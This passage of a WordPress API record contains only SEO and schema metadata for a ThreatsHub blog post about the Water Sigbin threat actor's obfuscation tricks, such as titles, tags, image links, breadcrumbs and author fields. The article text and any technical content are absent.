News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/8220-24-cover:Large?qlt=80\",\"datePublished\":\"2024-05-30T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/8220-24-cover:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/8220-24-cover:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : APT&amp;Targeted Attacks\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-apttargeted-attacks\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Decoding Water Sigbin&#8217;s Latest Obfuscation Tricks\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 
SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH 
Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Decoding Water Sigbin's Latest Obfuscation Tricks 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/","og_locale":"en_US","og_type":"article","og_title":"Decoding Water Sigbin's Latest Obfuscation Tricks 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-05-30T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/8220-24-cover:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. 
reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Decoding Water Sigbin&#8217;s Latest Obfuscation Tricks","datePublished":"2024-05-30T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/"},"wordCount":1486,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/8220-24-cover:Large?qlt=80","keywords":["Trend Micro Research : APT&amp;Targeted Attacks","Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cloud","Trend Micro Research : Endpoints","Trend Micro Research : Exploits&amp;Vulnerabilities","Trend Micro Research : Reports","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/","url":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/","name":"Decoding Water Sigbin's Latest Obfuscation Tricks 2026 | ThreatsHub Cybersecurity 
News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/8220-24-cover:Large?qlt=80","datePublished":"2024-05-30T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/8220-24-cover:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/8220-24-cover:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : APT&amp;Targeted Attacks","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-apttargeted-attacks\/"},{"@type":"ListItem","position":3,"name":"Decoding Water Sigbin&#8217;s Latest Obfuscation Tricks"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 
Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH 
Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/56188","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=56188"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/56188\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=56188"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=56188"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=56188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}